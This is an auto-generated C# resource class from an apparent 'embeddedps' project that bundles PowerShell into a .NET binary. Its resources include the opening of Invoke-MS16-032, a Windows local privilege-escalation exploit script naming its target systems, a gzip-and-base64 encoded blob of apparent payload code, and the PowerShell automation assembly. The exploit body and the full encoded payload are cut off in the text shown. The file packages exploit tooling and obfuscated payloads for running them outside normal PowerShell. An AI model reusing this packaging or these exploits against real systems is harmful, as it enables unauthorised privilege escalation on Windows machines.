//------------------------------------------------------------------------------
// <auto-generated>
//     This code was generated by a tool.
//     Runtime Version:4.0.30319.42000
//
//     Changes to this file may cause incorrect behavior and will be lost if
//     the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------

namespace embeddedps.Properties {
    using System;
    
    
    /// <summary>
    ///   A strongly-typed resource class, for looking up localized strings, etc.
    /// </summary>
    // This class was auto-generated by the StronglyTypedResourceBuilder
    // class via a tool like ResGen or Visual Studio.
    // To add or remove a member, edit your .ResX file then rerun ResGen
    // with the /str option, or rebuild your VS project.
    [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0")]
    [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
    [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
    internal class Resources {
        
        private static global::System.Resources.ResourceManager resourceMan;
        
        private static global::System.Globalization.CultureInfo resourceCulture;
        
        [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
        internal Resources() {
        }
        
        /// <summary>
        ///   Returns the cached ResourceManager instance used by this class.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Resources.ResourceManager ResourceManager {
            get {
                if (object.ReferenceEquals(resourceMan, null)) {
                    global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("embeddedps.Properties.Resources", typeof(Resources).Assembly);
                    resourceMan = temp;
                }
                return resourceMan;
            }
        }
        
        /// <summary>
        ///   Overrides the current thread's CurrentUICulture property for all
        ///   resource lookups using this strongly typed resource class.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Globalization.CultureInfo Culture {
            get {
                return resourceCulture;
            }
            set {
                resourceCulture = value;
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to H4sIAAAAAAAEAAuuLC5JzdXzT8pKTS6JjgUA2O8CQQ8AAAA=
        ///.
        /// </summary>
        internal static string iv16032 {
            get {
                return ResourceManager.GetString("iv16032", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to H4sIAAAAAAAEAOy9aXPiyLIw/LknYv6D3u4PbV/bLDbGuO87N44QwhZm32w8d6JDBgEyixgkjPG5578/mVmlXaz2zPSJMz0x3YBUWVVZuVdWVn8x7Vq6MRWU6Ysx0s5K+kQfqdbbzz/98+ef/v8vP/8Ua3TKlWpDafz8088/NYe6KZjduT6zhLH2os3VgWYKdhvhPJYQ1GnPhlXX+mMNoL9oVVmZPmusI8sQ5s6D8UoYG2rPBdE1JrOxZuEDfSpMtIkxX8UE6lcdj42lKayMBcLoGYI11KcDGM+iOxRU8+efeovJTOjOtZ42tXR1bApL3RoaC0vAkQrLuW7B+9BKEyZ2d0/6VJ2vCJ5ujmICTlGzZzhUoVNBghEtLG1eVieaMFPn8I+F4IY6dsvGpFsI4kkTtFetCy/3BHWg6lPTEiaLsaXDjGhiCMaMBRFpwhjHPWytPsGLOJbgRPpzYwKYXQkwERORaPSFe33aw76t4dxYDIbO90wsCb+pbPhVY6nN [rest of string was truncated]&quot;;.
        /// </summary>
        internal static string ivm {
            get {
                return ResourceManager.GetString("ivm", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to function Invoke-MS16-032 {
        ///&lt;#
        ///.SYNOPSIS
        ///    
        ///    PowerShell implementation of MS16-032. The exploit targets all vulnerable
        ///    operating systems that support PowerShell v2+. Credit for the discovery of
        ///    the bug and the logic to exploit it go to James Forshaw (@tiraniddo).
        ///    
        ///    Targets:
        ///    
        ///    * Win7-Win10 &amp; 2k8-2k12 &lt;== 32/64 bit!
        ///    * Tested on x32 Win7, x64 Win8, x64 2k12R2
        ///    
        ///    Notes:
        ///    
        ///    * In order for the race condition to succeed the machine must have 2+ CPU
        ///      co [rest of string was truncated]&quot;;.
        /// </summary>
        internal static string ms16032 {
            get {
                return ResourceManager.GetString("ms16032", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        internal static byte[] System_Management_Automation {
            get {
                object obj = ResourceManager.GetObject("System_Management_Automation", resourceCulture);
                return ((byte[])(obj));
            }
        }
    }
}
